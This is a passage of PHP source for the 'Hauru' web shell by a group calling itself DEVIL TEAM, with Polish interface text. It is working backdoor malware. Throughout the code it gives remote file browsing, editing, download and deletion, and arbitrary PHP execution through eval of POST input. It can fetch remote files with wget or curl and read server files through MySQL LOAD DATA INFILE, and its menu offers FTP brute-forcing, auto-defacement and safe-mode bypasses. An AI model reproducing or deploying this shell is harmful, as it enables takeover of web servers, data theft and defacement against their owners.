'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh'. '0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIy'. 'MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8'. 'QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIh'. 'MUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1'. 'hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJ'. 'ytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQ'. 'oL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYk'. 'NOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkp'. 'OUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6'. '/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJ'. 'kqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu'. '/rXi0ni4tJxZ2S9n3Vj/2Q==', 'txt'=> '/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC'. '4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyM'. 'jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUB'. 'AQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJ'. 'xFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaG'. 'lqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2'. 'uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgEC'. 'BAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJyg'. 'pKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpa'. 'anqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAP'. 'wD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAe'. 'MjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4N'. 'N8ttNyVe+ux//2Q==', 'file'=> '/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4'. 'nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjI'. 'yMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQE'. 'BAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDK'. 'BkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R'. '1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+T'. 'l5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAc'. 'FBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg'. '5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO'. '0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSo'. 'ILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO8'. '5ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYo'. 'wqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z', ); } $wersja='1.4 by Kacper'; $topwiadomosc='
Zapraszam na DEVIL TEAM => http://www.devilteam.eu/ !!!
'; $header=''.getenv("HTTP_HOST").' - DEVIL TEAM Hauru Shell '.$wersja.''.$zlo.''; $footer='
'; //> start bledy $plikistnieje="Plik juz istnieje."; $wgranoplik="Plik zostal pomyslnie wgrany."; $folderok="Folder stworzony."; $foldererror="Nie stworzono folderu."; $foldernieznaleziono="Nie znaleziono folderu."; $pusty="Folder nie jest pusty, lub nie masz do niego dostepu."; $plikusuniety="Plik Usuniety"; $folderusuniety="Folder usuniety"; $glowna = $_SERVER['PHP_SELF']; //koniec bledy //logowanie if(@$_POST['action']=="wyjscie")unset($_SESSION['an']); if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1'; if(@$_SESSION['an']==0){ echo $header; echo '
Login:
Haslo:
'; echo $footer; exit;} //koniec logowanie function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";} if($_SESSION['action']=="")$_SESSION['action']="przeglad"; if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action']; if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir']; $dir=chdir($dir); $dir=getcwd()."/"; $dir=str_replace("\\","/",$dir); //crdir if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";} //Typ OS if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0; //sciagnij echo base64_decode($img[$imgname]); if($action=="sciagnij"){ header('Content-Length:'.filesize($file).''); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$file.'"'); readfile($file); } //koniec sciagnij //usun plik if($action=="usun"){ if(unlink($file)) $topwiadomosc.=$plikusuniety; } //koniec usun plik //usun folder if($action=="usunfolder"){ if(!rmdir($file)) $topwiadomosc.=$GLOBALS['empty'];else $topwiadomosc.=$folderusuniety; } //koniec usun folder ?>
<= Wroc( + )Dalej => ||| Przegladaj | Komendy | SQL | Edytor | Php Eval | Windows Hack ;) | FTP Brute | AutoDeface | defined_vars() | Safe Mode Break'ery | Wgraj plik | PHPInfo | Usun Hauru | WYJSCIE | Info

"; if($GLOBALS['win']==1)echo $form_win; if($GLOBALS['win']==0){ echo $form_win; echo ''; } if(@$_POST['uploadloc']){ if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else $uploadfile = $dirupload."/".$_POST['filename']; if(!file_exists($dirupload)){createdir($dirupload);} if(file_exists($uploadfile))echo $GLOBALS['filext']; elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) echo $GLOBALS['uploadok']; } if(@$_POST['upload']){ if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename'])) switch($_POST['with']) { case wget: komendy(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename'].""); break; case fetch: komendy(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown'].""); break; case lynx: komendy(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename'].""); break; case links: komendy(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename'].""); break; case GET: komendy(which('GET')." ".$_POST['urldown']." > ".$_POST['filename'].""); break; case curl: komendy(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename'].""); break; } } } //koniec upload if($action=="phpinfo"){ echo "
$v){$_POST[$k] = stripslashes($v);}} @ini_set('max_execution_time',0); (@ini_get('safe_mode')=="1" ? $safe_mode="ON (zabezpieczony)" : $safe_mode="OFF (niezabezpieczony)"); (@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0); (strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0); echo 'Status Serwera (Safe Mode): '.$safe_mode.'
'; echo 'Zablokowanych funkcji: '.$disfunc.''; if(@$topwiadomosc!="") echo $topwiadomosc; ?>

";} //koniec komendy //przeglad FS function perms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); return $info; } function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } function scandire($dir){ echo ""; echo ""; if (is_dir($dir)) { if (@$dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if(filetype($dir . $file)=="dir") $dire[]=$file; if(filetype($dir . $file)=="file")$files[]=$file; } closedir($dh); @sort($dire); @sort($files); if ($GLOBALS['win']==1) { echo ""; } echo ""; for($i=0;$i'; } for($i=0;$i'; } echo "
Otwarta lokalizacja:
Wybierz dysk:"; for ($j=ord('C'); $j<=ord('Z'); $j++) if (@$dh = opendir(chr($j).":/")) echo ' '.chr($j).''; echo "
OS: ".@php_uname()."
Nazwy plikow i folderowTypRozmiarDostepOpcje
'.$dire[$i].'folder'.perms($link).'X
'.$files[$i].'
plik'.view_size(filesize($linkfile)).' '.perms($linkfile).' S E X
"; }}} if($action=="przeglad"){ scandire($dir); } //koniec przeglad FS //edytor if($action=="edytor"){ function writef($file,$data){ $fp = fopen($file,"w+"); fwrite($fp,$data); fclose($fp); } function readf($file){ if(!$le = fopen($file, "r")) $contents="Nie mozna otworzyc pliku! (nie masz dostepu)"; else { $contents = fread($le, filesize($file)); fclose($le);} return htmlspecialchars($contents); } if(@$_POST['save'])writef($file,$_POST['data']); echo "

"; } //koniec edytor //upload if($action=="upload"){ if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir; $form_win="
Wgraj do folderu:
Nowa nazwa pliku:
Adres do Pliku:
"; echo @ob_start();phpinfo();$info = ob_get_contents();ob_end_clean(); echo $info = preg_replace('%^.*(.*).*$%ms', '$1', $info); echo "
"; } //php eval if($action=="phpeval"){ echo "
<?php

?>
";} if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);} //koniec php eval //usun hauru if ($action=="usunhauru") { if (($submit == $rndcode) and ($submit != "")) { if (unlink(__FILE__)) {@ob_clean(); echo "Dzieki za uzywanie Hauru by DEVIL TEAM! ^ Zapraszam na strone http://www.devilteam.eu/"; hauruexit(); } else {echo "
Nie mozna usnac ".__FILE__."!
";} } else { if (!empty($rndcode)) {echo "Error: zly kod!";} $rnd = rand(0,9).rand(0,9).rand(0,9); echo "
Usun: ".__FILE__."
Jestes tego pewien?
Zeby to potwierdzic wpisz kod \"".$rnd."\" "; } } //koniec usun hauru //sql if ($action=="sql") { if (!empty($unset_surl)) {setcookie("hauru_surl"); $surl = "";} elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("hauru_surl",$surl);} else {$surl = $_REQUEST["hauru_surl"]; } $surl_autofill_include = TRUE; if ($surl_autofill_include) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} if (empty($surl)) { $surl = "?".$includestr; } $surl = htmlspecialchars($surl); $sql_surl = $surl."hauru=sql"; if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} $sql_surl .= "&"; ?>

Hauru SQL

"; if (!$sql_sock) {?>
Status SQL:
"; if (!$sql_sock) { if (!$sql_server) {echo "NIE POLACZONY";} else {echo "
Nie mozna polaczyc ;(
"; echo "".$err."";} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); $sqlquicklaunch[] = array("Statystyki Serwera",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); $sqlquicklaunch[] = array("Serwer Info",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); $sqlquicklaunch[] = array("Procesy",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); $sqlquicklaunch[] = array("Wyloguj",$surl."act=sql"); echo "
MySQL ".mysql_get_server_info()." (v.".mysql_get_proto_info ().") odpalony na ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." jako ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (haslo - \"".htmlspecialchars($sql_passwd)."\")
"; if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo "
"; } echo "
LoginHaslo Baza Danych 
HostPORT
">Home
".htmlspecialchars($sql_db)." } =-
"; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "".htmlspecialchars($row[0])." (".$count_row[0].")
"; mysql_free_result($count); $c++;} if (!$c) {echo "Nie znaleziono tabel w bazie danych.";} } } else { ?>INDEX
Prosze wybrac baze danych
"; $diplay = TRUE; if ($sql_db) { if (!is_numeric($c)) {$c = 0;} if ($c == 0) {$c = "no";} echo "
Jest ".$c." Tabel w tej Bazie Danych (".htmlspecialchars($sql_db).").
"; if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo "
"; $acts = array("","dump"); if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} elseif ($sql_tbl_act == "insert") { if ($sql_tbl_insert_radio == 1) { $keys = ""; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = ""; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result = mysql_query($sql_query); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ($sql_act == "query") { echo "
"; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query jest puste";} echo "Error:
".$sql_query_error."
";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo "
"; if (($sql_query) and (!$submit)) {echo "Naprawde chcesz:";} else {echo "SQL-Query :";} echo "



 
";} } if (in_array($sql_act,$acts)) { ?>
Stworz nowa tabele:
 
";} if ($sql_act == "newtbl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" stworzona!
"; } } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) {$perpage = 10;} $numpages = $count_row[0]/$perpage; $e = explode(" ",$sql_order); if (count($e) == 2) { if ($e[0] == "d") {$asc_desc = "DESC";} else {$asc_desc = "ASC";} $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query($query); echo "
Tabela ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." kolumn i ".$count_row[0]." pol)
"; echo "Przegladaj ]   "; echo "Wstaw ]   "; if ($sql_tbl_act == "insert") { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { } else { echo "

Wstaw pole w tabele:
"; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysql_query($sql_query,$sql_sock); $values = mysql_query($result); mysql_query($result); } else {$values = array();} echo "
"; foreach ($tbl_struct_fields as $field) { $name = $field["Field"]; if (empty($sql_tbl_insert_q)) {$v = "";} echo ""; $i++; } echo "
PoleTypFunkcjaWartosc
".htmlspecialchars($name)."".$field["Type"]."

"; echo "Wstaw nowe pole"; if (!empty($sql_tbl_insert_q)) {echo " lub Zapisz"; echo "";} echo "

"; } } if ($sql_tbl_act == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo "
"; echo " "; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} if (($i/30 == round($i/30)) and ($i > 0)) {echo "
";} else {echo " ";} } if ($i == 0) {echo "pusty";} echo "
Od:  Do:  
"; echo "
"; echo ""; echo ""; for ($i=0;$i"; if (empty($e[0])) {$e[0] = "a";} if ($e[1] != $v) {echo "".$v."";} else {echo "".$v."\"".$m."\"";} echo ""; } echo ""; echo ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo ""; $w = ""; $i = 0; foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} echo ""; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == "") {$v = "NULL";} echo ""; $i++; } echo ""; echo ""; } mysql_free_result($result); echo "
Akcja
".$v.""; echo "Usun "; echo "Edytuj "; echo "

 

"; } } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock); if (!$result) {echo mysql_smarterror();} else { echo "
"; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $tsize += $row["Data_length"]; $trows += $row["Rows"]; $size = view_size($row["Data_length"]); echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; $i++; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo "
Tabela
PolaTypStworzonyModyfikowanyRozmiarAkcja
 ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." Usun  Drop Dodaj 
?
".$i." tabele
".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

 

"; mysql_free_result($result); } } } } } { $acts = array("","newdb","serverstatus","servervars","processes","getfile"); if (in_array($sql_act,$acts)) {?>
Stworz nowa Baze Danych:
 
Pokaz Plik:
 
"; if ($sql_act == "newdb") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
";} else {echo "Cant create DB \"".htmlspecialchars($sql_newdb)."\".
Poniewaz:
".mysql_smarterror();} } if ($sql_act == "serverstatus") { $result = mysql_query("SHOW STATUS", $sql_sock); echo "
Statystyki Serwera:

"; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo "
NazwaValue
".$row[0]."".$row[1]."
"; mysql_free_result($result); } if ($sql_act == "servervars") { $result = mysql_query("SHOW VARIABLES", $sql_sock); echo "
Info Serwera:

"; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo "
NazwaValue
".$row[0]."".$row[1]."
"; mysql_free_result($result); } if ($sql_act == "processes") { if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Zabij Proces #".$kill."...gotowe.";} $result = mysql_query("SHOW PROCESSLIST", $sql_sock); echo "
Procesy:

"; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} echo "
IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Zabij
"; mysql_free_result($result); } if ($sql_act == "getfile") { $tmpdb = $sql_login."_tmpdb"; $select = mysql_select_db($tmpdb); if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} if ($select) { $created = FALSE; mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $result = mysql_query("SELECT * FROM tmp_file;"); if (!$result) {echo "Blad przy cytaniu pliku!! (nie masz dostepu)!";} else { for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
";} else {echo "File \"".$sql_getfile."\":
".nl2br(htmlspecialchars($f))."
";} mysql_free_result($result); mysql_query("DROP TABLE tmp_file;"); } } mysql_drop_db($tmpdb); } } } } echo ""; //koniec sql //info if ($action=="info") { echo "
Dzieki za uzywanie Hauru by DEVIL TEAM! ^ Zapraszam na strone http://www.devilteam.eu/
"; echo '

Hauru wersja '.$wersja.' sluzy do zarzadzania wlasnym serverem/ftp.

Autor nie odpowiada za dzialanie skryptu oraz za szkody nim wyrzadzone.

Jesli nie akceptujesz tych warunkow to nie uzywaj hauru!!

Z powazaniem grupa DEVIL TEAM

'; echo ""; echo base64_decode('PHAgYWxpZ249ImNlbnRlciI+PHNwYW4gY2xhc3M9InNwYWNlcm93Ij48aW1nIHNyYz0iaHR0cDovL2'. 'RpZ2FydC5pbWcuZGlnYXJ0LnBsL2RhdGEvaW1nLzM4LzQ4L2Rvd25sb2FkLzU5NDIzMC5qcGciIHdp'. 'ZHRoPSIxMDI0IiBoZWlnaHQ9Ijc1NiIgLz48L3NwYW4+PC9wPg0KICA8cCBhbGlnbj0iY2VudGVyIi'. 'BjbGFzcz0ic3R5bGU0Ij5Qb2xpc2ggV2FycmlvcnMgZnJvbSBERVZJTCBURUFNIDwvcD4NCiAgPHAg'. 'YWxpZ249ImNlbnRlciIgY2xhc3M9Im5hbWUiPjxzdHJvbmc+UG96ZHJvIGRsYSB3c3p5c3RraWNoIH'. 'oga2FuYWx1IElSQyBvcmF6IGZvcnVtIERFVklMIFRFQU0uPC9zdHJvbmc+PC9wPg0KPHAgYWxpZ249'. 'ImNlbnRlciIgY2xhc3M9InJvdzMiPiZxdW90O05handpJiMyODE7a3N6eSB3ciZvYWN1dGU7ZyB1a3'. 'J5amUgc2kmIzI4MTsgdyBtaWVqc2N1LCB3IGt0Jm9hY3V0ZTtyeW0gbmlnZHkgbmllIGImIzI4MTtk'. 'emllc3ogZ28gc3p1a2EmIzMyMjsmcXVvdDsgLSBKdWxpdXMgQ2Flc2FyIDc1IEJDPC9wPg0KICA8cC'. 